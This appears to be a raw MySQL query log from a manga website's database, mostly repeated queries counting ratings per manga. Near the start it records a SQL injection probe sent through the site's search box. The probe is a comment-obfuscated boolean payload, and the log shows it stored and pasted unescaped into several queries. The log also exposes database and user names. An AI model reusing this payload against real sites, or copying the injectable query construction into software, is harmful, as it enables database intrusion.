mangauser@localhost on u317079482_mangacherri_2 using Socket 330649158 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330649158 Quit 330649159 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649159 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330649159 Quit 330649160 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649161 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649160 Quit 330649161 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649161 Quit 330649162 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649163 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649162 Quit 330649163 Query INSERT INTO search_keywords (keyword, ip, created) VALUES ('1AND//3679((SELECT//CASE//3679//WHEN//3679//THEN//1//ELSE//0//END//FROM//RDBDATABASE))-- -', '169.150.196.30', '2026-02-26 03:28:58') 330649163 Quit 330649164 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649164 Query SELECT m.*, c.name AS latest_chapter, c.id AS latest_chapter_id FROM mangas m JOIN ( SELECT manga_id, MAX(id) AS latest_chapter_id FROM chapters GROUP BY manga_id ) lc ON lc.manga_id = m.id JOIN chapters c ON c.id = lc.latest_chapter_id WHERE ( m.title LIKE '%1AND//3679((SELECT//CASE//3679//WHEN//3679//THEN//1//ELSE//0//END//FROM//RDBDATABASE))-- -%' OR ( m.alternate_title IS NOT NULL AND m.alternate_title <> '' AND m.alternate_title LIKE '%1AND//3679((SELECT//CASE//3679//WHEN//3679//THEN//1//ELSE//0//END//FROM//RDBDATABASE))-- -%' ) ) 330649164 Quit 330649165 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649165 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = '1\'AND/**/3679=(\'~\'||(SELECT/**/CASE/**/3679/**/WHEN/**/3679/**/THEN/**/1/**/ELSE/**/0/**/END/**/FROM/**/RDB$DATABASE)||\'~\')-- -' 330649165 Quit 330649166 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649166 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%%') group by manga_id ORDER BY sum(view) DESC 330649166 Quit 330649167 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649168 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649167 Quit 330649168 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330649168 Quit 330649169 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649169 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330649169 Quit 330649170 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649170 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330649170 Quit 330649171 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649171 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330649171 Quit 330649172 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649172 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330649172 Quit 330649173 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649173 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330649173 Quit 330649174 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649174 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330649174 Quit 330649175 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649175 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330649175 Quit 330649176 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649176 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330649176 Quit 330649177 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649177 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330649177 Quit 330649178 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649178 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330649178 Quit 330649179 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649179 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330649179 Quit 330649180 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649180 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330649180 Quit 330649181 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649181 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330649181 Quit 330649182 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649182 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330649182 Quit 330649183 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649183 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330649183 Quit 330649184 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649184 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330649184 Quit 330649185 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649185 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330649185 Quit 330649186 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649186 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330649186 Quit 330649187 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649187 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330649187 Quit 330649188 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649188 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330649188 Quit 330649189 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649189 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330649189 Quit 330649190 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649190 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330649190 Quit 330649191 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649191 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330649191 Quit 330649192 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649192 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330649192 Quit 330649193 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649193 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330649193 Quit 330649194 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649194 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330649194 Quit 330649195 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649195 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330649195 Quit 330649196 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649196 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330649196 Quit 330649197 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649197 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330649197 Quit 330649198 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649198 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330649198 Quit 330649199 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649199 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330649199 Quit 330649200 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649200 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330649200 Quit 330649201 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649201 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330649201 Quit 330649202 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649202 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330649202 Quit 330649203 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649203 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330649203 Quit 330649204 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649204 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330649204 Quit 330649205 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649205 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330649205 Quit 330649206 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649206 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330649206 Quit 330649207 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649207 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330649207 Quit 330649208 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649208 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330649208 Quit 330649209 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649209 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330649209 Quit 330649210 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649210 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330649210 Quit 330649211 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649211 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330649211 Quit 330649212 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649212 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330649212 Quit 330649213 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649213 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330649213 Quit 330649214 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649214 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330649214 Quit 330649215 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649215 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330649215 Quit 330649216 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649216 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330649216 Quit 330649217 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649217 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330649217 Quit 330649218 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649218 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330649218 Quit 330649219 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649219 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330649219 Quit 330649220 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649220 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330649220 Quit 330649221 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649221 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330649221 Quit 330649222 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649222 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330649222 Quit 330649223 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649223 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330649223 Quit 330649224 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649224 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330649224 Quit 330649225 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649225 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330649225 Quit 330649226 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649226 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330649226 Quit 330649227 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649227 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330649227 Quit 330649228 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649228 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330649228 Quit 330649229 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649229 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330649229 Quit 330649230 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649230 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330649230 Quit 330649231 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649231 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330649231 Quit 330649232 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649232 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330649232 Quit 330649233 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649233 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330649233 Quit 330649234 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649234 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330649234 Quit 330649235 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649235 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330649235 Quit 330649236 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649236 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330649236 Quit 330649237 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649237 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330649237 Quit 330649238 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649238 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330649238 Quit 330649239 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649239 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330649239 Quit 330649240 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649240 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330649240 Quit 330649241 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649241 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330649241 Quit 330649242 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649242 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330649242 Quit 330649243 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649243 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330649243 Quit 330649244 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649244 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330649244 Quit 330649245 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649245 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330649245 Quit 330649246 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649246 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330649246 Quit 330649247 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649247 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330649247 Quit 330649248 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649248 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330649248 Quit 330649249 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649249 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330649249 Quit 330649250 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649250 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330649250 Quit 330649251 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649251 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330649251 Quit 330649252 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649252 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330649252 Quit 330649253 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649253 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330649253 Quit 330649254 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649254 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330649254 Quit 330649255 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649255 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330649255 Quit 330649256 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649256 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330649256 Quit 330649257 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649257 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330649257 Quit 330649258 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649258 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330649258 Quit 330649259 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649259 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330649259 Quit 330649260 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649260 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330649260 Quit 330649261 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649261 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330649261 Quit 330649262 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649262 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330649262 Quit 330649263 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649263 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330649263 Quit 330649264 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649264 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330649264 Quit 330649265 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649265 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330649265 Quit 330649266 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649266 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330649266 Quit 330649267 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649267 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330649267 Quit 330649268 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649268 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330649268 Quit 330649269 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649269 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330649269 Quit 330649270 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649270 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330649270 Quit 330649271 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649271 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330649271 Quit 330649272 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649272 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330649272 Quit 330649273 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649273 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330649273 Quit 330649274 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649274 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330649274 Quit 330649275 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649275 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330649275 Quit 330649276 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649276 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330649276 Quit 330649277 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649277 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330649277 Quit 330649278 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649278 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330649278 Quit 330649279 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649279 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330649279 Quit 330649280 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649280 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330649280 Quit 330649281 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649281 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330649281 Quit 330649282 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649282 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330649282 Quit 330649283 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649283 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330649283 Quit 330649284 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649284 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330649284 Quit 330649285 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649285 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330649285 Quit 330649286 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649286 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330649286 Quit 330649287 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649287 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330649287 Quit 330649288 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649288 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330649288 Quit 330649289 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649289 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330649289 Quit 330649290 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649290 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330649290 Quit 330649291 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649291 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330649291 Quit 330649292 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649292 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330649292 Quit 330649293 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649293 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330649293 Quit 330649294 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649294 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330649294 Quit 330649295 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649295 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330649295 Quit 330649296 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649296 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330649296 Quit 330649297 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649297 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330649297 Quit 330649298 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649298 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330649298 Quit 330649299 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649299 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330649299 Quit 330649300 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649300 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330649300 Quit 330649301 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649301 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330649301 Quit 330649302 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649302 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330649302 Quit 330649303 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649303 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330649303 Quit 330649304 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649304 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330649304 Quit 330649305 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649305 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330649305 Quit 330649306 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649306 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating 